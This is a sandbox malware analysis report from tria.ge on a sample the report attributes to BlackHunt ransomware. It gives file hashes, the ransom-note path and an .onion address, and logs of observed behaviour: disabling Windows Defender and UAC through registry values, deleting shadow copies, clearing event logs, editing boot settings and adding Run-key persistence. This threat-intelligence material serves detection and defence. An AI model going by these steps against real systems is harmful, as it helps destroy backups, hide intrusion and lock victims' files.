Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
179s -
max time network
170s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:54
Static task
static1
Behavioral task
behavioral1
Sample
7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
Resource
win10v2004-20231215-en
General
-
Target
7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe
-
Size
707KB
-
MD5
050c63191280ddb539b8175a7638828a
-
SHA1
95d84dc1722a532d05190d5a39e1164c992ea098
-
SHA256
7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb
-
SHA512
1917817ca31a04b98f0ff90f79f4dd8984410287849ecc43c096b89a0df176f01a092c407f9bdf0d1280394186fdd419930da9fd0640296f3d78476ab31186a4
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1x8Evnh:6uaTmkZJ+naie5OTamgEoKxLWk6h
Malware Config
Extracted
F:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 3064 fsutil.exe 2752 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 816 wevtutil.exe 4268 wevtutil.exe 5048 wevtutil.exe 1384 wevtutil.exe 3208 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6140 bcdedit.exe 548 bcdedit.exe 3728 bcdedit.exe 4208 bcdedit.exe -
Renames multiple (345) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 5372 wbadmin.exe 3692 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\W: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\M: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\S: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\G: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\J: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\T: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\A: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\K: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\Z: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\U: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\P: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\X: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\V: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\Y: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\L: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\E: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\I: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\N: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\O: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\H: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\B: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\Q: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened (read-only) \??\R: 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\bcel.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\jpeg.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\sa-jdi.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\giflib.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_pt_BR.properties 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\localedata.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\US_export_policy.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\libxslt.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngdatatype.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jre-1.8\bin\server\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\COPYRIGHT 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jre-1.8\lib\security\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\gl.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\InitializeOut.odp 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\pkcs11cryptotoken.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngcc.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libffi.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\xmlresolver.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\cldrdata.jar 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\unlimited\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\COPYRIGHT 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\glib.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jre-1.8\bin\plugin2\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jre-1.8\lib\security\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\ecc.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\thaidict.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\jfr\#BlackHunt_ReadMe.txt 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\security\trusted.libraries 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\joni.md 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\Java\jre-1.8\legal\#BlackHunt_Private.key 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#BlackHunt_ReadMe.hta 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2904 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4444 vssadmin.exe 1820 vssadmin.exe 6120 vssadmin.exe 6132 vssadmin.exe 4548 vssadmin.exe 3668 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeRestorePrivilege 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeBackupPrivilege 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeTakeOwnershipPrivilege 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeAuditPrivilege 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeSecurityPrivilege 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeIncBasePriorityPrivilege 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Token: SeBackupPrivilege 4856 vssvc.exe Token: SeRestorePrivilege 4856 vssvc.exe Token: SeAuditPrivilege 4856 vssvc.exe Token: SeBackupPrivilege 6112 wbengine.exe Token: SeRestorePrivilege 6112 wbengine.exe Token: SeSecurityPrivilege 6112 wbengine.exe Token: SeSecurityPrivilege 3208 wevtutil.exe Token: SeBackupPrivilege 3208 wevtutil.exe Token: SeSecurityPrivilege 4268 wevtutil.exe Token: SeBackupPrivilege 4268 wevtutil.exe Token: SeSecurityPrivilege 5048 wevtutil.exe Token: SeBackupPrivilege 5048 wevtutil.exe Token: SeSecurityPrivilege 1384 wevtutil.exe Token: SeBackupPrivilege 1384 wevtutil.exe Token: SeSecurityPrivilege 816 wevtutil.exe Token: SeBackupPrivilege 816 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4756 wrote to memory of 2812 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 94 PID 4756 wrote to memory of 2812 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 94 PID 4756 wrote to memory of 1488 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 96 PID 4756 wrote to memory of 1488 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 96 PID 4756 wrote to memory of 224 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 98 PID 4756 wrote to memory of 224 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 98 PID 4756 wrote to memory of 1072 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 102 PID 4756 wrote to memory of 1072 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 102 PID 2812 wrote to memory of 1320 2812 cmd.exe 100 PID 2812 wrote to memory of 1320 2812 cmd.exe 100 PID 1488 wrote to memory of 1976 1488 cmd.exe 103 PID 1488 wrote to memory of 1976 1488 cmd.exe 103 PID 4756 wrote to memory of 1328 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 104 PID 4756 wrote to memory of 1328 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 104 PID 224 wrote to memory of 3352 224 cmd.exe 106 PID 224 wrote to memory of 3352 224 cmd.exe 106 PID 1072 wrote to memory of 3500 1072 cmd.exe 107 PID 1072 wrote to memory of 3500 1072 cmd.exe 107 PID 1328 wrote to memory of 5048 1328 cmd.exe 108 PID 1328 wrote to memory of 5048 1328 cmd.exe 108 PID 4756 wrote to memory of 3252 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 110 PID 4756 wrote to memory of 3252 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 110 PID 4756 wrote to memory of 2788 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 112 PID 4756 wrote to memory of 2788 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 112 PID 4756 wrote to memory of 3416 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 114 PID 4756 wrote to memory of 3416 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 114 PID 4756 wrote to memory of 2488 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 116 PID 4756 wrote to memory of 2488 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 116 PID 4756 wrote to memory of 316 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 118 PID 4756 wrote to memory of 316 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 118 PID 4756 wrote to memory of 1692 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 120 PID 4756 wrote to memory of 1692 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 120 PID 4756 wrote to memory of 4856 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 124 PID 4756 wrote to memory of 4856 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 124 PID 3252 wrote to memory of 3432 3252 cmd.exe 123 PID 3252 wrote to memory of 3432 3252 cmd.exe 123 PID 4756 wrote to memory of 632 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 125 PID 4756 wrote to memory of 632 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 125 PID 4756 wrote to memory of 5004 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 127 PID 4756 wrote to memory of 5004 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 127 PID 2788 wrote to memory of 1820 2788 cmd.exe 129 PID 2788 wrote to memory of 1820 2788 cmd.exe 129 PID 2488 wrote to memory of 3760 2488 cmd.exe 130 PID 2488 wrote to memory of 3760 2488 cmd.exe 130 PID 316 wrote to memory of 3940 316 cmd.exe 132 PID 316 wrote to memory of 3940 316 cmd.exe 132 PID 4756 wrote to memory of 2584 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 131 PID 4756 wrote to memory of 2584 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 131 PID 3416 wrote to memory of 4344 3416 cmd.exe 134 PID 3416 wrote to memory of 4344 3416 cmd.exe 134 PID 5004 wrote to memory of 2080 5004 cmd.exe 135 PID 5004 wrote to memory of 2080 5004 cmd.exe 135 PID 4756 wrote to memory of 2892 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 136 PID 4756 wrote to memory of 2892 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 136 PID 632 wrote to memory of 1884 632 cmd.exe 138 PID 632 wrote to memory of 1884 632 cmd.exe 138 PID 1692 wrote to memory of 4440 1692 cmd.exe 139 PID 1692 wrote to memory of 4440 1692 cmd.exe 139 PID 4756 wrote to memory of 2860 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 143 